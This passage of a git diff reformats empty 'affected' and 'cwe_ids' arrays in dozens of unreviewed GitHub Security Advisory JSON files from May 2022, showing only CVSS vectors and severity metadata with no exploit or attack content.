b/advisories/unreviewed/2022/05/GHSA-7qwh-rfjp-fwf4/GHSA-7qwh-rfjp-fwf4.json index 80f4eb8c172..c7fac1624a6 100644 --- a/advisories/unreviewed/2022/05/GHSA-7qwh-rfjp-fwf4/GHSA-7qwh-rfjp-fwf4.json +++ b/advisories/unreviewed/2022/05/GHSA-7qwh-rfjp-fwf4/GHSA-7qwh-rfjp-fwf4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7r2c-7672-rvhq/GHSA-7r2c-7672-rvhq.json b/advisories/unreviewed/2022/05/GHSA-7r2c-7672-rvhq/GHSA-7r2c-7672-rvhq.json index 9b4f4ea8094..90fb61a7461 100644 --- a/advisories/unreviewed/2022/05/GHSA-7r2c-7672-rvhq/GHSA-7r2c-7672-rvhq.json +++ b/advisories/unreviewed/2022/05/GHSA-7r2c-7672-rvhq/GHSA-7r2c-7672-rvhq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7r45-7xq5-v6wq/GHSA-7r45-7xq5-v6wq.json b/advisories/unreviewed/2022/05/GHSA-7r45-7xq5-v6wq/GHSA-7r45-7xq5-v6wq.json index e3c38a28dc6..dd451ad976a 100644 --- a/advisories/unreviewed/2022/05/GHSA-7r45-7xq5-v6wq/GHSA-7r45-7xq5-v6wq.json +++ b/advisories/unreviewed/2022/05/GHSA-7r45-7xq5-v6wq/GHSA-7r45-7xq5-v6wq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7w32-w9cg-v7qx/GHSA-7w32-w9cg-v7qx.json b/advisories/unreviewed/2022/05/GHSA-7w32-w9cg-v7qx/GHSA-7w32-w9cg-v7qx.json index db0e18b2a80..25bdd75cf15 100644 --- a/advisories/unreviewed/2022/05/GHSA-7w32-w9cg-v7qx/GHSA-7w32-w9cg-v7qx.json +++ b/advisories/unreviewed/2022/05/GHSA-7w32-w9cg-v7qx/GHSA-7w32-w9cg-v7qx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7xjq-jwh8-5q8w/GHSA-7xjq-jwh8-5q8w.json b/advisories/unreviewed/2022/05/GHSA-7xjq-jwh8-5q8w/GHSA-7xjq-jwh8-5q8w.json index e435265d09c..a2160b2bd40 100644 --- a/advisories/unreviewed/2022/05/GHSA-7xjq-jwh8-5q8w/GHSA-7xjq-jwh8-5q8w.json +++ b/advisories/unreviewed/2022/05/GHSA-7xjq-jwh8-5q8w/GHSA-7xjq-jwh8-5q8w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-85mh-wphv-chhh/GHSA-85mh-wphv-chhh.json b/advisories/unreviewed/2022/05/GHSA-85mh-wphv-chhh/GHSA-85mh-wphv-chhh.json index d275af60792..4ed5481733c 100644 --- a/advisories/unreviewed/2022/05/GHSA-85mh-wphv-chhh/GHSA-85mh-wphv-chhh.json +++ b/advisories/unreviewed/2022/05/GHSA-85mh-wphv-chhh/GHSA-85mh-wphv-chhh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-85rg-mhrm-6wjr/GHSA-85rg-mhrm-6wjr.json b/advisories/unreviewed/2022/05/GHSA-85rg-mhrm-6wjr/GHSA-85rg-mhrm-6wjr.json index aa52d06476b..9f649c38bae 100644 --- a/advisories/unreviewed/2022/05/GHSA-85rg-mhrm-6wjr/GHSA-85rg-mhrm-6wjr.json +++ b/advisories/unreviewed/2022/05/GHSA-85rg-mhrm-6wjr/GHSA-85rg-mhrm-6wjr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8657-j78q-jmw2/GHSA-8657-j78q-jmw2.json b/advisories/unreviewed/2022/05/GHSA-8657-j78q-jmw2/GHSA-8657-j78q-jmw2.json index cc898bbac21..697e200755f 100644 --- a/advisories/unreviewed/2022/05/GHSA-8657-j78q-jmw2/GHSA-8657-j78q-jmw2.json +++ b/advisories/unreviewed/2022/05/GHSA-8657-j78q-jmw2/GHSA-8657-j78q-jmw2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8774-h3c9-hphw/GHSA-8774-h3c9-hphw.json b/advisories/unreviewed/2022/05/GHSA-8774-h3c9-hphw/GHSA-8774-h3c9-hphw.json index 07a55d41393..bb5ea912f85 100644 --- a/advisories/unreviewed/2022/05/GHSA-8774-h3c9-hphw/GHSA-8774-h3c9-hphw.json +++ b/advisories/unreviewed/2022/05/GHSA-8774-h3c9-hphw/GHSA-8774-h3c9-hphw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8783-x78j-4qxv/GHSA-8783-x78j-4qxv.json b/advisories/unreviewed/2022/05/GHSA-8783-x78j-4qxv/GHSA-8783-x78j-4qxv.json index da2c705726d..65918426080 100644 --- a/advisories/unreviewed/2022/05/GHSA-8783-x78j-4qxv/GHSA-8783-x78j-4qxv.json +++ b/advisories/unreviewed/2022/05/GHSA-8783-x78j-4qxv/GHSA-8783-x78j-4qxv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-87g7-6w9f-j789/GHSA-87g7-6w9f-j789.json b/advisories/unreviewed/2022/05/GHSA-87g7-6w9f-j789/GHSA-87g7-6w9f-j789.json index 5e7ca07a7da..c6aae3bed38 100644 --- a/advisories/unreviewed/2022/05/GHSA-87g7-6w9f-j789/GHSA-87g7-6w9f-j789.json +++ b/advisories/unreviewed/2022/05/GHSA-87g7-6w9f-j789/GHSA-87g7-6w9f-j789.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-88pc-g4m6-pvhp/GHSA-88pc-g4m6-pvhp.json b/advisories/unreviewed/2022/05/GHSA-88pc-g4m6-pvhp/GHSA-88pc-g4m6-pvhp.json index ae80e9a2e0c..d3b9cacb6bb 100644 --- a/advisories/unreviewed/2022/05/GHSA-88pc-g4m6-pvhp/GHSA-88pc-g4m6-pvhp.json +++ b/advisories/unreviewed/2022/05/GHSA-88pc-g4m6-pvhp/GHSA-88pc-g4m6-pvhp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-88pf-2475-xxvg/GHSA-88pf-2475-xxvg.json b/advisories/unreviewed/2022/05/GHSA-88pf-2475-xxvg/GHSA-88pf-2475-xxvg.json index 271cc9cfe14..af16be439c6 100644 --- a/advisories/unreviewed/2022/05/GHSA-88pf-2475-xxvg/GHSA-88pf-2475-xxvg.json +++ b/advisories/unreviewed/2022/05/GHSA-88pf-2475-xxvg/GHSA-88pf-2475-xxvg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-89mx-74w9-vr97/GHSA-89mx-74w9-vr97.json b/advisories/unreviewed/2022/05/GHSA-89mx-74w9-vr97/GHSA-89mx-74w9-vr97.json index 1e0e3dd2099..d2213d33caa 100644 --- a/advisories/unreviewed/2022/05/GHSA-89mx-74w9-vr97/GHSA-89mx-74w9-vr97.json +++ b/advisories/unreviewed/2022/05/GHSA-89mx-74w9-vr97/GHSA-89mx-74w9-vr97.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8f46-rc2r-w7j6/GHSA-8f46-rc2r-w7j6.json b/advisories/unreviewed/2022/05/GHSA-8f46-rc2r-w7j6/GHSA-8f46-rc2r-w7j6.json index fd0511236f3..aa41dec6dd7 100644 --- a/advisories/unreviewed/2022/05/GHSA-8f46-rc2r-w7j6/GHSA-8f46-rc2r-w7j6.json +++ b/advisories/unreviewed/2022/05/GHSA-8f46-rc2r-w7j6/GHSA-8f46-rc2r-w7j6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8fj7-jmxj-53q9/GHSA-8fj7-jmxj-53q9.json b/advisories/unreviewed/2022/05/GHSA-8fj7-jmxj-53q9/GHSA-8fj7-jmxj-53q9.json index 9fa4b7e8c2a..fb0235e5cf4 100644 --- a/advisories/unreviewed/2022/05/GHSA-8fj7-jmxj-53q9/GHSA-8fj7-jmxj-53q9.json +++ b/advisories/unreviewed/2022/05/GHSA-8fj7-jmxj-53q9/GHSA-8fj7-jmxj-53q9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8g9j-vp2c-mg7r/GHSA-8g9j-vp2c-mg7r.json b/advisories/unreviewed/2022/05/GHSA-8g9j-vp2c-mg7r/GHSA-8g9j-vp2c-mg7r.json index 588bd57115a..2b44a1e6ec1 100644 --- a/advisories/unreviewed/2022/05/GHSA-8g9j-vp2c-mg7r/GHSA-8g9j-vp2c-mg7r.json +++ b/advisories/unreviewed/2022/05/GHSA-8g9j-vp2c-mg7r/GHSA-8g9j-vp2c-mg7r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8g9p-xj27-qw5f/GHSA-8g9p-xj27-qw5f.json b/advisories/unreviewed/2022/05/GHSA-8g9p-xj27-qw5f/GHSA-8g9p-xj27-qw5f.json index 9dbd8d0c8ae..f8a51906165 100644 --- a/advisories/unreviewed/2022/05/GHSA-8g9p-xj27-qw5f/GHSA-8g9p-xj27-qw5f.json +++ b/advisories/unreviewed/2022/05/GHSA-8g9p-xj27-qw5f/GHSA-8g9p-xj27-qw5f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8gjf-26mv-v6h6/GHSA-8gjf-26mv-v6h6.json b/advisories/unreviewed/2022/05/GHSA-8gjf-26mv-v6h6/GHSA-8gjf-26mv-v6h6.json index 181d208aa4b..9c117eda358 100644 --- a/advisories/unreviewed/2022/05/GHSA-8gjf-26mv-v6h6/GHSA-8gjf-26mv-v6h6.json +++ b/advisories/unreviewed/2022/05/GHSA-8gjf-26mv-v6h6/GHSA-8gjf-26mv-v6h6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8j4x-m92q-c7wx/GHSA-8j4x-m92q-c7wx.json b/advisories/unreviewed/2022/05/GHSA-8j4x-m92q-c7wx/GHSA-8j4x-m92q-c7wx.json index 77399235f9b..c4381f05424 100644 --- a/advisories/unreviewed/2022/05/GHSA-8j4x-m92q-c7wx/GHSA-8j4x-m92q-c7wx.json +++ b/advisories/unreviewed/2022/05/GHSA-8j4x-m92q-c7wx/GHSA-8j4x-m92q-c7wx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8pm9-x397-wxmf/GHSA-8pm9-x397-wxmf.json b/advisories/unreviewed/2022/05/GHSA-8pm9-x397-wxmf/GHSA-8pm9-x397-wxmf.json index 360cfe5140f..fb06a71782d 100644 --- a/advisories/unreviewed/2022/05/GHSA-8pm9-x397-wxmf/GHSA-8pm9-x397-wxmf.json +++ b/advisories/unreviewed/2022/05/GHSA-8pm9-x397-wxmf/GHSA-8pm9-x397-wxmf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8pph-m89g-pffm/GHSA-8pph-m89g-pffm.json b/advisories/unreviewed/2022/05/GHSA-8pph-m89g-pffm/GHSA-8pph-m89g-pffm.json index dae874f4c8e..f5229dcc409 100644 --- a/advisories/unreviewed/2022/05/GHSA-8pph-m89g-pffm/GHSA-8pph-m89g-pffm.json +++ b/advisories/unreviewed/2022/05/GHSA-8pph-m89g-pffm/GHSA-8pph-m89g-pffm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8qg8-hh66-4wch/GHSA-8qg8-hh66-4wch.json b/advisories/unreviewed/2022/05/GHSA-8qg8-hh66-4wch/GHSA-8qg8-hh66-4wch.json index a328ff304a4..a7456235f32 100644 --- a/advisories/unreviewed/2022/05/GHSA-8qg8-hh66-4wch/GHSA-8qg8-hh66-4wch.json +++ b/advisories/unreviewed/2022/05/GHSA-8qg8-hh66-4wch/GHSA-8qg8-hh66-4wch.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8vvh-jp6f-wr4j/GHSA-8vvh-jp6f-wr4j.json b/advisories/unreviewed/2022/05/GHSA-8vvh-jp6f-wr4j/GHSA-8vvh-jp6f-wr4j.json index f652fcb5919..f2855dfe70e 100644 --- a/advisories/unreviewed/2022/05/GHSA-8vvh-jp6f-wr4j/GHSA-8vvh-jp6f-wr4j.json +++ b/advisories/unreviewed/2022/05/GHSA-8vvh-jp6f-wr4j/GHSA-8vvh-jp6f-wr4j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8wx2-h54g-674g/GHSA-8wx2-h54g-674g.json b/advisories/unreviewed/2022/05/GHSA-8wx2-h54g-674g/GHSA-8wx2-h54g-674g.json index aee5ecba90e..0e56207d4cf 100644 --- a/advisories/unreviewed/2022/05/GHSA-8wx2-h54g-674g/GHSA-8wx2-h54g-674g.json +++ b/advisories/unreviewed/2022/05/GHSA-8wx2-h54g-674g/GHSA-8wx2-h54g-674g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8x93-7gj9-73c3/GHSA-8x93-7gj9-73c3.json b/advisories/unreviewed/2022/05/GHSA-8x93-7gj9-73c3/GHSA-8x93-7gj9-73c3.json index 99c11a76b1a..f7b9cd8e4ca 100644 --- a/advisories/unreviewed/2022/05/GHSA-8x93-7gj9-73c3/GHSA-8x93-7gj9-73c3.json +++ b/advisories/unreviewed/2022/05/GHSA-8x93-7gj9-73c3/GHSA-8x93-7gj9-73c3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-92f5-6w73-42pg/GHSA-92f5-6w73-42pg.json b/advisories/unreviewed/2022/05/GHSA-92f5-6w73-42pg/GHSA-92f5-6w73-42pg.json index 926674c5d6d..40f40b90329 100644 --- a/advisories/unreviewed/2022/05/GHSA-92f5-6w73-42pg/GHSA-92f5-6w73-42pg.json +++ b/advisories/unreviewed/2022/05/GHSA-92f5-6w73-42pg/GHSA-92f5-6w73-42pg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-953p-grm5-8vpv/GHSA-953p-grm5-8vpv.json b/advisories/unreviewed/2022/05/GHSA-953p-grm5-8vpv/GHSA-953p-grm5-8vpv.json index 4706429d318..81c313d6b94 100644 --- a/advisories/unreviewed/2022/05/GHSA-953p-grm5-8vpv/GHSA-953p-grm5-8vpv.json +++ b/advisories/unreviewed/2022/05/GHSA-953p-grm5-8vpv/GHSA-953p-grm5-8vpv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-968q-p8m8-c87j/GHSA-968q-p8m8-c87j.json b/advisories/unreviewed/2022/05/GHSA-968q-p8m8-c87j/GHSA-968q-p8m8-c87j.json index 3dcb4e874e9..181bf7fb0c3 100644 --- a/advisories/unreviewed/2022/05/GHSA-968q-p8m8-c87j/GHSA-968q-p8m8-c87j.json +++ b/advisories/unreviewed/2022/05/GHSA-968q-p8m8-c87j/GHSA-968q-p8m8-c87j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-98cr-r2jm-q7gp/GHSA-98cr-r2jm-q7gp.json b/advisories/unreviewed/2022/05/GHSA-98cr-r2jm-q7gp/GHSA-98cr-r2jm-q7gp.json index 04b99723435..dc094aca8b2 100644 --- a/advisories/unreviewed/2022/05/GHSA-98cr-r2jm-q7gp/GHSA-98cr-r2jm-q7gp.json +++ b/advisories/unreviewed/2022/05/GHSA-98cr-r2jm-q7gp/GHSA-98cr-r2jm-q7gp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-98h5-4j63-gwrf/GHSA-98h5-4j63-gwrf.json b/advisories/unreviewed/2022/05/GHSA-98h5-4j63-gwrf/GHSA-98h5-4j63-gwrf.json index c7f5fa1df3c..18794de67de 100644 --- a/advisories/unreviewed/2022/05/GHSA-98h5-4j63-gwrf/GHSA-98h5-4j63-gwrf.json +++ b/advisories/unreviewed/2022/05/GHSA-98h5-4j63-gwrf/GHSA-98h5-4j63-gwrf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-99fm-5qxm-cg7x/GHSA-99fm-5qxm-cg7x.json b/advisories/unreviewed/2022/05/GHSA-99fm-5qxm-cg7x/GHSA-99fm-5qxm-cg7x.json index 78e1bfbe121..3cfda6628b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-99fm-5qxm-cg7x/GHSA-99fm-5qxm-cg7x.json +++ b/advisories/unreviewed/2022/05/GHSA-99fm-5qxm-cg7x/GHSA-99fm-5qxm-cg7x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-99r5-cmq9-gw22/GHSA-99r5-cmq9-gw22.json b/advisories/unreviewed/2022/05/GHSA-99r5-cmq9-gw22/GHSA-99r5-cmq9-gw22.json index 2c5261562e9..021cb94aa47 100644 --- a/advisories/unreviewed/2022/05/GHSA-99r5-cmq9-gw22/GHSA-99r5-cmq9-gw22.json +++ b/advisories/unreviewed/2022/05/GHSA-99r5-cmq9-gw22/GHSA-99r5-cmq9-gw22.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9c96-jcjc-w3fq/GHSA-9c96-jcjc-w3fq.json b/advisories/unreviewed/2022/05/GHSA-9c96-jcjc-w3fq/GHSA-9c96-jcjc-w3fq.json index 5b5b46078c7..b49b8e2736e 100644 --- a/advisories/unreviewed/2022/05/GHSA-9c96-jcjc-w3fq/GHSA-9c96-jcjc-w3fq.json +++ b/advisories/unreviewed/2022/05/GHSA-9c96-jcjc-w3fq/GHSA-9c96-jcjc-w3fq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9f52-c27g-jfqq/GHSA-9f52-c27g-jfqq.json b/advisories/unreviewed/2022/05/GHSA-9f52-c27g-jfqq/GHSA-9f52-c27g-jfqq.json index 0950fc187af..3fb3456ee6e 100644 --- a/advisories/unreviewed/2022/05/GHSA-9f52-c27g-jfqq/GHSA-9f52-c27g-jfqq.json +++ b/advisories/unreviewed/2022/05/GHSA-9f52-c27g-jfqq/GHSA-9f52-c27g-jfqq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9f9f-hjmh-g96m/GHSA-9f9f-hjmh-g96m.json b/advisories/unreviewed/2022/05/GHSA-9f9f-hjmh-g96m/GHSA-9f9f-hjmh-g96m.json index 800d72c0fe4..cf08d2617b5 100644 --- a/advisories/unreviewed/2022/05/GHSA-9f9f-hjmh-g96m/GHSA-9f9f-hjmh-g96m.json +++ b/advisories/unreviewed/2022/05/GHSA-9f9f-hjmh-g96m/GHSA-9f9f-hjmh-g96m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9fq9-9693-mj36/GHSA-9fq9-9693-mj36.json b/advisories/unreviewed/2022/05/GHSA-9fq9-9693-mj36/GHSA-9fq9-9693-mj36.json index c7986660009..b04fdf34e7d 100644 --- a/advisories/unreviewed/2022/05/GHSA-9fq9-9693-mj36/GHSA-9fq9-9693-mj36.json +++ b/advisories/unreviewed/2022/05/GHSA-9fq9-9693-mj36/GHSA-9fq9-9693-mj36.json @@ -13,9 +13,7 @@ "score": 